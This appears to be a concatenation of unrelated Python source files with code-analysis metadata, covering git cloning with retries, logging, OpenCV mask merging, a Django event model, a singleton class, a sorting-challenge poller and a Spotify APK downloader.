                        f"{repo_name} connection refused/reset in fetch. "
                        "Probably by JI firewall."
                    )
                    logger.info(f"wait for {retry_interval} seconds to retry...")
                    sleep(retry_interval)
                    if retry_interval < 64:
                        retry_interval *= 2
                elif "Remote branch master not found in upstream origin" in e.stderr:
                    retry_interval = 0
                    logger.error(f"{repo_name} origin/master not found")
                else:
                    raise
        return repo_dir
| [
"os.path.exists",
"joint_teapot.utils.logger.logger.warning",
"sys.path.insert",
"git.Repo.clone_from",
"os.path.join",
"git.Repo",
"time.sleep",
"sys.path.remove",
"os.path.isdir",
"joint_teapot.utils.logger.logger.error",
"joint_teapot.utils.logger.logger.info",
"joint_teapot.utils.logger.lo... | [((146, 175), 'sys.path.remove', 'sys.path.remove', (['current_path'], {}), '(current_path)\n', (161, 175), False, 'import sys\n'), ((234, 266), 'sys.path.insert', 'sys.path.insert', (['(0)', 'current_path'], {}), '(0, current_path)\n', (249, 266), False, 'import sys\n'), ((649, 680), 'joint_teapot.utils.logger.logger.debug', 'logger.debug', (['"""Git initialized"""'], {}), "('Git initialized')\n", (661, 680), False, 'from joint_teapot.utils.logger import logger\n'), ((844, 883), 'os.path.join', 'os.path.join', (['self.repos_dir', 'repo_name'], {}), '(self.repos_dir, repo_name)\n', (856, 883), False, 'import os\n'), ((2095, 2134), 'os.path.join', 'os.path.join', (['self.repos_dir', 'repo_name'], {}), '(self.repos_dir, repo_name)\n', (2107, 2134), False, 'import os\n'), ((2146, 2170), 'os.path.exists', 'os.path.exists', (['repo_dir'], {}), '(repo_dir)\n', (2160, 2170), False, 'import os\n'), ((2389, 2428), 'os.path.join', 'os.path.join', (['self.repos_dir', 'repo_name'], {}), '(self.repos_dir, repo_name)\n', (2401, 2428), False, 'import os\n'), ((503, 527), 'os.path.isdir', 'os.path.isdir', (['repos_dir'], {}), '(repos_dir)\n', (516, 527), False, 'import os\n'), ((2191, 2205), 'git.Repo', 'Repo', (['repo_dir'], {}), '(repo_dir)\n', (2195, 2205), False, 'from git import Repo\n'), ((996, 1116), 'git.Repo.clone_from', 'Repo.clone_from', (['f"""ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git"""', 'repo_dir'], {'branch': 'branch'}), "(\n f'ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git',\n repo_dir, branch=branch)\n", (1011, 1116), False, 'from git import Repo\n'), ((1370, 1465), 'joint_teapot.utils.logger.logger.warning', 'logger.warning', (['f"""{repo_name} connection refused/reset in clone. Probably by JI firewall."""'], {}), "(\n f'{repo_name} connection refused/reset in clone. 
Probably by JI firewall.')\n", (1384, 1465), False, 'from joint_teapot.utils.logger import logger\n'), ((1554, 1615), 'joint_teapot.utils.logger.logger.info', 'logger.info', (['f"""wait for {retry_interval} seconds to retry..."""'], {}), "(f'wait for {retry_interval} seconds to retry...')\n", (1565, 1615), False, 'from joint_teapot.utils.logger import logger\n'), ((1636, 1657), 'time.sleep', 'sleep', (['retry_interval'], {}), '(retry_interval)\n', (1641, 1657), False, 'from time import sleep\n'), ((3002, 3097), 'joint_teapot.utils.logger.logger.warning', 'logger.warning', (['f"""{repo_name} connection refused/reset in fetch. Probably by JI firewall."""'], {}), "(\n f'{repo_name} connection refused/reset in fetch. Probably by JI firewall.')\n", (3016, 3097), False, 'from joint_teapot.utils.logger import logger\n'), ((3186, 3247), 'joint_teapot.utils.logger.logger.info', 'logger.info', (['f"""wait for {retry_interval} seconds to retry..."""'], {}), "(f'wait for {retry_interval} seconds to retry...')\n", (3197, 3247), False, 'from joint_teapot.utils.logger import logger\n'), ((3268, 3289), 'time.sleep', 'sleep', (['retry_interval'], {}), '(retry_interval)\n', (3273, 3289), False, 'from time import sleep\n'), ((1894, 1948), 'joint_teapot.utils.logger.logger.error', 'logger.error', (['f"""{repo_name} origin/{branch} not found"""'], {}), "(f'{repo_name} origin/{branch} not found')\n", (1906, 1948), False, 'from joint_teapot.utils.logger import logger\n'), ((3523, 3575), 'joint_teapot.utils.logger.logger.error', 'logger.error', (['f"""{repo_name} origin/master not found"""'], {}), "(f'{repo_name} origin/master not found')\n", (3535, 3575), False, 'from joint_teapot.utils.logger import logger\n')] |
from .watch_time import time_str
import fitlog
class Logger:
    """Minimal logger that mirrors every line to a file, stdout and fitlog.

    Fix: the underlying file handle was never released; a ``close()``
    method is added (backward-compatible) so callers can flush and free it.
    """

    def __init__(self, fil_path=None):
        # Caller must supply a path; the file is truncated on open.
        self.log_fil = open(fil_path, "w", encoding="utf-8")

    def nolog(self, cont=""):
        """No-op sink, usable as a drop-in replacement for log_print."""
        pass

    def log_print(self, cont=""):
        """Write *cont* as one line to the log file, stdout and fitlog."""
        self.log_fil.write(cont + "\n")
        # Flush immediately so the file stays current if the run crashes.
        self.log_fil.flush()
        print(cont)
        fitlog.add_to_line(cont)

    def log_print_w_time(self, cont=""):
        """Like log_print, with the current wall-clock time appended."""
        self.log_print(str(cont) + " | " + time_str())

    def close(self):
        """Release the underlying log file handle."""
        self.log_fil.close()
| [
"fitlog.add_to_line"
] | [((308, 332), 'fitlog.add_to_line', 'fitlog.add_to_line', (['cont'], {}), '(cont)\n', (326, 332), False, 'import fitlog\n')] |
import cv2
import numpy as np
import os
# Overlay selected label colors from images in upper_layer_path onto a
# base mask extracted from same-named images in under_layer_path, then
# write the merged result back next to the upper-layer image as PNG.
under_layer_path = '/home/ubuntu/share/cam_lidar/Tu_indoor/red2'
upper_layer_path = "/home/ubuntu/share/cam_lidar/Tu_indoor/aisle02_dir"
target_files = os.listdir(upper_layer_path)
# Keep plain files only (skip subdirectories).
target_imgs = [f for f in target_files if os.path.isfile(os.path.join(upper_layer_path, f))]
try:
    target_imgs.remove(".DS_Store")
except ValueError:
    pass
# Single exact color selected from the base image; lower == upper so
# cv2.inRange matches only that value.
# NOTE(review): channel order is presumably BGR (cv2.imread default) — confirm.
lower = np.array([0, 0, 128])
upper = np.array([0, 0, 128])
# Label colors to transfer from the upper-layer image.
target_colors = np.array([
    [0, 0, 0],
    [192, 0, 0],
    [128, 64, 128],
    [0, 0, 128],
    [0, 64, 64],
    [128, 128, 192],
    [128, 0, 64],
    [128, 128, 128],
])
for img_name in target_imgs:
    base_img = cv2.imread(os.path.join(under_layer_path, img_name), cv2.IMREAD_COLOR)
    result_img = np.zeros(base_img.shape, dtype=base_img.dtype)
    # Start the result from the base image's pixels of the selected color.
    img_mask = cv2.inRange(base_img, lower, upper)
    img_mask_color = cv2.bitwise_and(base_img, base_img, mask=img_mask)
    result_img = cv2.add(result_img, img_mask_color)
    # Debug snapshot; overwritten on every iteration.
    cv2.imwrite("result.png", result_img)
    target_img = cv2.imread(os.path.join(upper_layer_path, img_name), cv2.IMREAD_COLOR)
    for color in target_colors:
        # For each label color: clear those pixels in the result, then
        # paste the upper image's pixels of that color on top.
        img_mask = cv2.inRange(target_img, color, color)
        img_mask_inv = cv2.bitwise_not(img_mask)
        img_mask_color = cv2.bitwise_and(target_img, target_img, mask=img_mask)
        result_img = cv2.bitwise_and(result_img, result_img, mask=img_mask_inv)
        result_img = cv2.add(result_img, img_mask_color)
    print(os.path.join(upper_layer_path, img_name[:-3]) + "png")
    # Save alongside the upper-layer image, forcing a .png extension
    # (assumes the original extension is exactly 3 characters).
    cv2.imwrite(os.path.join(upper_layer_path, img_name[:-3] + "png"), result_img)
| [
"cv2.imwrite",
"os.listdir",
"cv2.inRange",
"cv2.bitwise_and",
"os.path.join",
"numpy.array",
"numpy.zeros",
"cv2.bitwise_not",
"cv2.add"
] | [((193, 221), 'os.listdir', 'os.listdir', (['upper_layer_path'], {}), '(upper_layer_path)\n', (203, 221), False, 'import os\n'), ((393, 414), 'numpy.array', 'np.array', (['[0, 0, 128]'], {}), '([0, 0, 128])\n', (401, 414), True, 'import numpy as np\n'), ((423, 444), 'numpy.array', 'np.array', (['[0, 0, 128]'], {}), '([0, 0, 128])\n', (431, 444), True, 'import numpy as np\n'), ((461, 589), 'numpy.array', 'np.array', (['[[0, 0, 0], [192, 0, 0], [128, 64, 128], [0, 0, 128], [0, 64, 64], [128, \n 128, 192], [128, 0, 64], [128, 128, 128]]'], {}), '([[0, 0, 0], [192, 0, 0], [128, 64, 128], [0, 0, 128], [0, 64, 64],\n [128, 128, 192], [128, 0, 64], [128, 128, 128]])\n', (469, 589), True, 'import numpy as np\n'), ((938, 984), 'numpy.zeros', 'np.zeros', (['base_img.shape'], {'dtype': 'base_img.dtype'}), '(base_img.shape, dtype=base_img.dtype)\n', (946, 984), True, 'import numpy as np\n'), ((1001, 1036), 'cv2.inRange', 'cv2.inRange', (['base_img', 'lower', 'upper'], {}), '(base_img, lower, upper)\n', (1012, 1036), False, 'import cv2\n'), ((1058, 1108), 'cv2.bitwise_and', 'cv2.bitwise_and', (['base_img', 'base_img'], {'mask': 'img_mask'}), '(base_img, base_img, mask=img_mask)\n', (1073, 1108), False, 'import cv2\n'), ((1126, 1161), 'cv2.add', 'cv2.add', (['result_img', 'img_mask_color'], {}), '(result_img, img_mask_color)\n', (1133, 1161), False, 'import cv2\n'), ((1166, 1203), 'cv2.imwrite', 'cv2.imwrite', (['"""result.png"""', 'result_img'], {}), "('result.png', result_img)\n", (1177, 1203), False, 'import cv2\n'), ((861, 901), 'os.path.join', 'os.path.join', (['under_layer_path', 'img_name'], {}), '(under_layer_path, img_name)\n', (873, 901), False, 'import os\n'), ((1233, 1273), 'os.path.join', 'os.path.join', (['upper_layer_path', 'img_name'], {}), '(upper_layer_path, img_name)\n', (1245, 1273), False, 'import os\n'), ((1344, 1381), 'cv2.inRange', 'cv2.inRange', (['target_img', 'color', 'color'], {}), '(target_img, color, color)\n', (1355, 1381), False, 'import 
cv2\n'), ((1405, 1430), 'cv2.bitwise_not', 'cv2.bitwise_not', (['img_mask'], {}), '(img_mask)\n', (1420, 1430), False, 'import cv2\n'), ((1456, 1510), 'cv2.bitwise_and', 'cv2.bitwise_and', (['target_img', 'target_img'], {'mask': 'img_mask'}), '(target_img, target_img, mask=img_mask)\n', (1471, 1510), False, 'import cv2\n'), ((1532, 1590), 'cv2.bitwise_and', 'cv2.bitwise_and', (['result_img', 'result_img'], {'mask': 'img_mask_inv'}), '(result_img, result_img, mask=img_mask_inv)\n', (1547, 1590), False, 'import cv2\n'), ((1612, 1647), 'cv2.add', 'cv2.add', (['result_img', 'img_mask_color'], {}), '(result_img, img_mask_color)\n', (1619, 1647), False, 'import cv2\n'), ((1731, 1784), 'os.path.join', 'os.path.join', (['upper_layer_path', "(img_name[:-3] + 'png')"], {}), "(upper_layer_path, img_name[:-3] + 'png')\n", (1743, 1784), False, 'import os\n'), ((279, 312), 'os.path.join', 'os.path.join', (['upper_layer_path', 'f'], {}), '(upper_layer_path, f)\n', (291, 312), False, 'import os\n'), ((1659, 1704), 'os.path.join', 'os.path.join', (['upper_layer_path', 'img_name[:-3]'], {}), '(upper_layer_path, img_name[:-3])\n', (1671, 1704), False, 'import os\n')] |
''' Events Model '''
import uuid
from django.db import models
# Utils Model
from eventup.utils.models import GeneralModel
class Event(GeneralModel):
    ''' Event Model '''
    # Primary key: random UUID instead of an auto-increment integer.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    # Event data
    name = models.CharField(max_length=100, unique=True)
    date = models.DateTimeField(null=True, blank=True)
    description = models.CharField(max_length=500)
    url = models.URLField()
    # Optional banner image stored under MEDIA_ROOT/banner/pictures/.
    banner_img = models.ImageField(
        'banner picture',
        upload_to='banner/pictures/',
        blank=True,
        null=True
    )
    banner_title = models.CharField(max_length=300, blank=True)
    # Event Relations
    # SET_NULL keeps the event alive if its template is deleted.
    template = models.ForeignKey(
        to="event_templates.Template",
        on_delete=models.SET_NULL,
        null=True,
    )
    sponsor = models.ManyToManyField(
        to="Sponsor",
    )
    schedule = models.ManyToManyField(
        to="Schedule",
    )

    def __str__(self):
        # Human-readable identity used by the admin and shell.
        return str(self.name)
| [
"django.db.models.ForeignKey",
"django.db.models.ManyToManyField",
"django.db.models.ImageField",
"django.db.models.CharField",
"django.db.models.DateTimeField",
"django.db.models.URLField",
"django.db.models.UUIDField"
] | [((195, 265), 'django.db.models.UUIDField', 'models.UUIDField', ([], {'primary_key': '(True)', 'default': 'uuid.uuid4', 'editable': '(False)'}), '(primary_key=True, default=uuid.uuid4, editable=False)\n', (211, 265), False, 'from django.db import models\n'), ((295, 340), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'unique': '(True)'}), '(max_length=100, unique=True)\n', (311, 340), False, 'from django.db import models\n'), ((352, 395), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)', 'blank': '(True)'}), '(null=True, blank=True)\n', (372, 395), False, 'from django.db import models\n'), ((414, 446), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(500)'}), '(max_length=500)\n', (430, 446), False, 'from django.db import models\n'), ((457, 474), 'django.db.models.URLField', 'models.URLField', ([], {}), '()\n', (472, 474), False, 'from django.db import models\n'), ((492, 585), 'django.db.models.ImageField', 'models.ImageField', (['"""banner picture"""'], {'upload_to': '"""banner/pictures/"""', 'blank': '(True)', 'null': '(True)'}), "('banner picture', upload_to='banner/pictures/', blank=\n True, null=True)\n", (509, 585), False, 'from django.db import models\n'), ((638, 682), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(300)', 'blank': '(True)'}), '(max_length=300, blank=True)\n', (654, 682), False, 'from django.db import models\n'), ((721, 811), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""event_templates.Template"""', 'on_delete': 'models.SET_NULL', 'null': '(True)'}), "(to='event_templates.Template', on_delete=models.SET_NULL,\n null=True)\n", (738, 811), False, 'from django.db import models\n'), ((853, 889), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'to': '"""Sponsor"""'}), "(to='Sponsor')\n", (875, 889), False, 'from django.db import models\n'), ((921, 958), 'django.db.models.ManyToManyField', 
'models.ManyToManyField', ([], {'to': '"""Schedule"""'}), "(to='Schedule')\n", (943, 958), False, 'from django.db import models\n')] |
#! /usr/bin/env python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import Overlay
def moveCenterPtOutOfExtras():
    """Promote center/nadir coordinates from each overlay's ``extras``
    blob onto first-class model fields, saving every overlay."""
    for overlay in Overlay.objects.all():
        extras = overlay.extras
        overlay.centerLat = extras.centerLat
        overlay.centerLon = extras.centerLon
        overlay.nadirLat = extras.nadirLat
        overlay.nadirLon = extras.nadirLon
        overlay.save()
moveCenterPtOutOfExtras() | [
"django.setup",
"geocamTiePoint.models.Overlay.objects.all"
] | [((70, 84), 'django.setup', 'django.setup', ([], {}), '()\n', (82, 84), False, 'import django\n'), ((176, 197), 'geocamTiePoint.models.Overlay.objects.all', 'Overlay.objects.all', ([], {}), '()\n', (195, 197), False, 'from geocamTiePoint.models import Overlay\n')] |
#coding:utf-8
import threading
class Singleton(object):
    """Thread-safe singleton base class.

    Subclasses must override ``__Singleton_Init__``; it is called exactly
    once, with the arguments of the first construction.

    Fixes over the original:
    * the original created a brand-new ``threading.Lock`` on every
      ``__new__`` call, so no two callers ever contended on the same
      lock and the "guard" serialized nothing — the lock must be shared;
    * ``release()`` was skipped if ``__Singleton_Init__`` raised; the
      ``with`` statement guarantees release.
    """

    # One lock shared by the class hierarchy, guarding instance creation.
    _lock = threading.Lock()

    def __new__(cls, *args, **kwargs):
        with cls._lock:
            if not hasattr(cls, "_instance"):
                cls._instance = object.__new__(cls)
                cls._instance.__Singleton_Init__(*args, **kwargs)
        return cls._instance

    def __Singleton_Init__(self):
        # Deliberately abstract: subclasses supply their own initializer.
        raise RuntimeError("__Singleton_Init__ must be overwritten")
"threading.Lock"
] | [((111, 127), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (125, 127), False, 'import threading\n')] |
from generator.actions import Actions
import random
import string
import struct
import numpy as np
import math
import datetime as dt
import ctypes
def kaprica_mixin(self):
    """Monkey-patch an Actions instance with a byte-substitution ("xlat")
    layer: read/write are wrapped so all traffic is translated through a
    256-entry permutation table derived from a string seed.
    (Python 2 code: uses xrange and byte-string ord/chr.)"""
    if hasattr(self, 'xlat_seed'):
        return  # already mixed in; never patch twice
    def xlat_seed(seed):
        def hash_string(seed):
            # Simple 32-bit mixing hash of the seed string.
            H = 0x314abc86
            for c in seed:
                H = (H * 37) & 0xffffffff
                H ^= ord(c)
                H = ((H << 13) ^ (H >> 19)) & 0xffffffff
            return H
        def hash_iterate(H):
            # PRNG step used to drive the shuffle below.
            H = (H * 3) & 0xffffffff
            H = ((H << 13) ^ (H >> 19) ^ (H >> 21)) & 0xffffffff
            return H
        # Fisher-Yates shuffle of the identity byte map, seeded by the hash.
        xmap = list(xrange(256))
        xmap_inv = list(xrange(256))
        state = hash_string(seed)
        for i in xrange(255, 0, -1):
            j = state % i
            state = hash_iterate(state)
            xmap[i], xmap[j] = xmap[j], xmap[i]
        # Build the inverse table so received data can be decoded.
        for i in xrange(256):
            xmap_inv[xmap[i]] = i
        self.xlat_map = xmap
        self.xlat_map_inv = xmap_inv
    self.xlat_seed = xlat_seed
    # Translation disabled until xlat_seed() is called.
    self.xlat_map = None
    self.xlat_map_inv = None
    def xlat_string(s, inverse=False):
        # inverse=True decodes (target -> plain); default encodes.
        if inverse:
            return ''.join([chr(self.xlat_map_inv[ord(c)]) for c in s])
        return ''.join([chr(self.xlat_map[ord(c)]) for c in s])
    self.xlat_string = xlat_string
    def read(delim=None, length=None, expect=None):
        # Encode delim/expect so they match the target's translated output.
        if self.xlat_map:
            if delim:
                delim = self.xlat_string(delim)
            if expect:
                expect = self.xlat_string(expect)
        return self._original_read(delim=delim, length=length, expect=expect)
    self._original_read = self.read
    self.read = read
    def write(s):
        # Encode outgoing data before handing it to the original write.
        if self.xlat_map:
            if s:
                s = self.xlat_string(s)
        return self._original_write(s)
    self._original_write = self.write
    self.write = write
def random_word(max_size=10, min_size=2):
    """Return a random lowercase word of min_size..max_size characters.

    Four times out of five the alphabet includes digits.
    (Python 2 code: string.letters.)
    """
    # randint(0, 4) is truthy 4/5 of the time -> letters + digits.
    if random.randint(0, 4):
        alphabet = string.letters + string.digits
    else:
        alphabet = string.letters
    length = random.randint(min_size, max(min_size, max_size))
    return "".join(random.choice(alphabet) for _ in range(length)).lower()
def random_text(max_words=10, min_words=3):
    """Return min_words..max_words random words, each followed by a
    single space (Python 2 code: xrange)."""
    word_count = random.randint(min_words, max(min_words, max_words))
    return "".join(random_word() + ' ' for _ in xrange(word_count))
class Cs10Fun(Actions):
    """CGC poller for the CS10Fun sorting-lesson challenge binary.

    Mirrors the target's menu protocol: every expected byte of output is
    asserted verbatim, and self._cur_array shadows the target's array so
    printouts can be predicted. (Python 2 code: xrange.)"""

    def _read(self, data):
        # Expect exactly the bytes of `data` from the target.
        self.read(length=len(data), expect=data)

    def _read_array(self, array=None):
        """Expect the target's formatted dump of `array`
        (defaults to the tracked current array)."""
        if not array:
            array = self._cur_array
        if not len(array):
            self._read("Empty Array\n")
        else:
            self._read("Array data\n")
            # Reproduce the target's "[a, b, c]" rendering; the final
            # slice trims the trailing ", " from the last element.
            temp_list = []
            for val in array:
                temp_list.append("%d, " % val)
            temp_list[-1] = temp_list[-1][:-2]
            self._read("[" + ''.join(temp_list) + ']\n')

    def start(self):
        # Handshake: install the xlat layer, seed it, and verify the
        # full magic page before the banner.
        #self.delay(100)
        kaprica_mixin(self)
        self.xlat_seed('2e0715f1709c')
        self.write(self.magic_page[:4])
        self.read(length=0x1000, expect=self.magic_page)
        self._cur_array = []
        self._read("Welcome to CS10Fun!\n")
        self._read("Today's lesson is on sorting! We're going to cover 4 types of sorts.\n")
        self._read("Before we begin, create an array of ints\n")
        self.menu()
        self.enter_array()

    def menu(self):
        # Expect the full main-menu printout, including the live count.
        self._read("Main Menu\n")
        self._read("1. Enter Array\n")
        self._read("2. Multiply Array\n")
        self._read("3. Try Insertion Sort\n")
        self._read("4. Try Selection Sort\n")
        self._read("5. Try Heap Sort\n")
        self._read("6. Try Merge Sort\n")
        self._read("7. Reprint Array\n")
        self._read("0. Exit\n")
        self._read(" -----\n")
        self._read("Current Number of items in array = %d\n" % len(self._cur_array))
        #self._read_array()
        self._read(" -----\n")
        self._read("Make a selection\n")

    def enter_array(self):
        # Menu option 1: send 1-100 random ints and mirror them locally.
        self.write('1\n')
        self._read("Enter a list of numbers to sort. End the list with ';;'\n")
        self._cur_array = []
        for x in xrange(random.randint(1,100)):
            self._cur_array.append(random.randint(-1000000000, 1000000000))
        self.write(','.join([str(x) for x in self._cur_array]) + ',;;\n')
        self._read("New Array\n")
        self._read("Number of items in array = %d\n" % len(self._cur_array))
        self._read_array()

    def multiply_array(self):
        # Menu option 2: grow the array by a small factor, avoiding the
        # 1025..1048 length window the loop below rerolls away from.
        self.write('2\n')
        if len(self._cur_array) > 10000:
            self._read("Array is too long. Can't multiply any more\n")
        elif len(self._cur_array):
            self._read("Quick Grow! Enter a list multiplier. End number with ';'\n")
            multiplier = random.randint(1,3)
            while multiplier * len(self._cur_array) > 1024 and multiplier * len(self._cur_array) <= 1048:
                multiplier = random.randint(1,3)
            self.write("%d;\n" % multiplier)
            self._cur_array *= multiplier
            self._read("Multiplied Array\n")
            self._read("Number of items in array = %d\n" % len(self._cur_array))
            self._read_array()

    def insert_sort(self):
        # Menu option 3: expect the sorted array, then the ops line.
        self.write('3\n')
        self._read_array(sorted(self._cur_array))
        #self.read(expect='Insertion sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
        self.read(delim='\n')

    def selection_sort(self):
        # Menu option 4.
        self.write('4\n')
        self._read_array(sorted(self._cur_array))
        #self.read(expect='Selection sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
        self.read(delim='\n')

    def heap_sort(self):
        # Menu option 5.
        self.write('5\n')
        self._read_array(sorted(self._cur_array))
        #self.read(expect='Heap sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
        self.read(delim='\n')

    def merge_sort(self):
        # Menu option 6.
        self.write('6\n')
        self._read_array(sorted(self._cur_array))
        #self.read(expect='Merge sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
        self.read(delim='\n')

    def reprint_array(self):
        # Menu option 7: array is echoed back unsorted.
        self.write('7\n')
        self._read("Current Array\n")
        self._read("Number of items in array = %d\n" % len(self._cur_array))
        self._read_array()

    def exit(self):
        # Menu option 0: clean shutdown.
        self.write('0\n')
        self._read("Thanks for joining us\n")
        self._read("See you next time\n")
| [
"random.choice",
"random.randint"
] | [((1945, 1965), 'random.randint', 'random.randint', (['(0)', '(4)'], {}), '(0, 4)\n', (1959, 1965), False, 'import random\n'), ((2141, 2175), 'random.randint', 'random.randint', (['min_size', 'max_size'], {}), '(min_size, max_size)\n', (2155, 2175), False, 'import random\n'), ((2403, 2439), 'random.randint', 'random.randint', (['min_words', 'max_words'], {}), '(min_words, max_words)\n', (2417, 2439), False, 'import random\n'), ((4305, 4327), 'random.randint', 'random.randint', (['(1)', '(100)'], {}), '(1, 100)\n', (4319, 4327), False, 'import random\n'), ((4364, 4403), 'random.randint', 'random.randint', (['(-1000000000)', '(1000000000)'], {}), '(-1000000000, 1000000000)\n', (4378, 4403), False, 'import random\n'), ((4932, 4952), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (4946, 4952), False, 'import random\n'), ((2196, 2221), 'random.choice', 'random.choice', (['characters'], {}), '(characters)\n', (2209, 2221), False, 'import random\n'), ((5087, 5107), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (5101, 5107), False, 'import random\n')] |
# Kano or Terminator
# By <NAME>
# I will not be held responsible for:
# any shenanigans
import os
# ಠ_ಠ
# ¯¯\_(ツ)_/¯¯
# (╭ರ_•́)
# Render the face in three colored segments via shell printf escapes.
for printf_cmd in (
    "printf '\e[0;35;1;1m (╭ರ_'",
    "printf '\e[0;31;1;5m°'",
    "printf '\e[0;35;1;1m)\n'",
):
    os.system(printf_cmd)
| [
"os.system"
] | [((130, 177), 'os.system', 'os.system', (['"""printf \'\\\\e[0;35;1;1m (╭ರ_\'"""'], {}), '("printf \'\\\\e[0;35;1;1m (╭ರ_\'")\n', (139, 177), False, 'import os\n'), ((177, 213), 'os.system', 'os.system', (['"""printf \'\\\\e[0;31;1;5m°\'"""'], {}), '("printf \'\\\\e[0;31;1;5m°\'")\n', (186, 213), False, 'import os\n'), ((213, 254), 'os.system', 'os.system', (['"""printf \'\\\\e[0;35;1;1m)\n\'"""'], {}), '("""printf \'\\\\e[0;35;1;1m)\n\'""")\n', (222, 254), False, 'import os\n')] |
import os
import re
import urllib.request
import click
import requests
from tqdm import tqdm
URL_UPTODOWN = 'https://spotify.de.uptodown.com/android/download'
URL_GHAPI = 'https://api.github.com/repos/Theta-Dev/Spotify-Gender-Ex/commits/master'
URL_RTABLE = 'https://raw.githubusercontent.com/Theta-Dev/Spotify-Gender-Ex/%s/spotify_gender_ex/res/replacements.json'
class Downloader:
    """Scrapes the Spotify APK download URL and version from uptodown
    and fetches the Gender-Ex replacement table from GitHub."""

    def __init__(self, download_id=''):
        # Direct-download links look like https://dw.uptodown.com/dwn/<token>.
        pattern_url = re.escape('https://dw.uptodown.com/dwn/') + r'(\w|\.|\/|-|\+|=)+'
        # Version string inside <div class=version>x.y.z</div>.
        pattern_version = r'(?<=<div class=version>)(\d|\.)+'
        if download_id:
            url = URL_UPTODOWN + '/' + download_id
        else:
            url = URL_UPTODOWN
        try:
            r = requests.get(url)
        except Exception:
            # Network failure: fall back to sentinel values so callers
            # can detect the miss via an empty spotify_url.
            msg = 'Spotify-Version konnte nicht abgerufen werden'
            click.echo(msg)
            self.spotify_version = 'NA'
            self.spotify_url = ''
            return
        search_url = re.search(pattern_url, r.text)
        search_version = re.search(pattern_version, r.text)
        if not search_url or not search_version:
            # Page layout changed or download not present: same sentinels.
            msg = 'Spotify-Version nicht gefunden'
            click.echo(msg)
            self.spotify_version = 'NA'
            self.spotify_url = ''
            return
        self.spotify_url = str(search_url[0])
        self.spotify_version = str(search_version[0])

    def download_spotify(self, output_path):
        """Download the scraped APK to *output_path*; returns False when
        no download URL was found during construction."""
        if not self.spotify_url:
            return False
        return _download(self.spotify_url, output_path, 'Spotify')

    @staticmethod
    def get_replacement_table_raw():
        """Fetch replacements.json pinned to the latest master commit.

        Returns the raw text, or (implicitly) None on any failure so the
        caller falls back to the built-in table."""
        try:
            # Get latest commit
            sha = requests.get(URL_GHAPI).json()['sha']
            return requests.get(URL_RTABLE % sha).text
        except Exception:
            click.echo('Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle.')
# See here
# https://stackoverflow.com/questions/15644964/python-progress-bar-and-downloads
class _DownloadProgressBar(tqdm):
    """tqdm subclass whose update_to matches the reporthook signature of
    urllib.request.urlretrieve (blocks transferred, block size, total)."""

    def update_to(self, b=1, bsize=1, tsize=None):
        if tsize is not None:
            self.total = tsize
        transferred = b * bsize
        # tqdm.update takes a delta, so subtract what was already counted.
        self.update(transferred - self.n)
def _download(url, output_path, description=''):
    """Download *url* to *output_path* with a progress bar.

    Returns True when the file exists afterwards, False on any error.
    """
    if description:
        message = 'Lade %s herunter: %s' % (description, url)
    else:
        message = 'Herunterladen: ' + url
    click.echo(message)
    bar_label = url.split('/')[-1]
    try:
        with _DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=bar_label) as bar:
            urllib.request.urlretrieve(url, filename=output_path, reporthook=bar.update_to)
    except Exception:
        return False
    return os.path.isfile(output_path)
| [
"re.escape",
"requests.get",
"os.path.isfile",
"click.echo",
"re.search"
] | [((2637, 2664), 'os.path.isfile', 'os.path.isfile', (['output_path'], {}), '(output_path)\n', (2651, 2664), False, 'import os\n'), ((981, 1011), 're.search', 're.search', (['pattern_url', 'r.text'], {}), '(pattern_url, r.text)\n', (990, 1011), False, 'import re\n'), ((1037, 1071), 're.search', 're.search', (['pattern_version', 'r.text'], {}), '(pattern_version, r.text)\n', (1046, 1071), False, 'import re\n'), ((2269, 2324), 'click.echo', 'click.echo', (["('Lade %s herunter: %s' % (description, url))"], {}), "('Lade %s herunter: %s' % (description, url))\n", (2279, 2324), False, 'import click\n'), ((2343, 2378), 'click.echo', 'click.echo', (["('Herunterladen: ' + url)"], {}), "('Herunterladen: ' + url)\n", (2353, 2378), False, 'import click\n'), ((449, 490), 're.escape', 're.escape', (['"""https://dw.uptodown.com/dwn/"""'], {}), "('https://dw.uptodown.com/dwn/')\n", (458, 490), False, 'import re\n'), ((728, 745), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (740, 745), False, 'import requests\n'), ((1185, 1200), 'click.echo', 'click.echo', (['msg'], {}), '(msg)\n', (1195, 1200), False, 'import click\n'), ((850, 865), 'click.echo', 'click.echo', (['msg'], {}), '(msg)\n', (860, 865), False, 'import click\n'), ((1743, 1773), 'requests.get', 'requests.get', (['(URL_RTABLE % sha)'], {}), '(URL_RTABLE % sha)\n', (1755, 1773), False, 'import requests\n'), ((1817, 1918), 'click.echo', 'click.echo', (['"""Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle."""'], {}), "(\n 'Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle.'\n )\n", (1827, 1918), False, 'import click\n'), ((1686, 1709), 'requests.get', 'requests.get', (['URL_GHAPI'], {}), '(URL_GHAPI)\n', (1698, 1709), False, 'import requests\n')] |
# Intraday latency check function
from datetime import datetime
import pytz
from datacoco_batch.batch import Batch
from datacoco_core.logger import Logger
log = Logger()
def convert_time(t):
    """Attach the UTC timezone to a naive ``datetime``.

    :param t: naive (tzinfo-less) ``datetime`` assumed to represent UTC.
    :returns: the same wall-clock time as a timezone-aware UTC ``datetime``.
    """
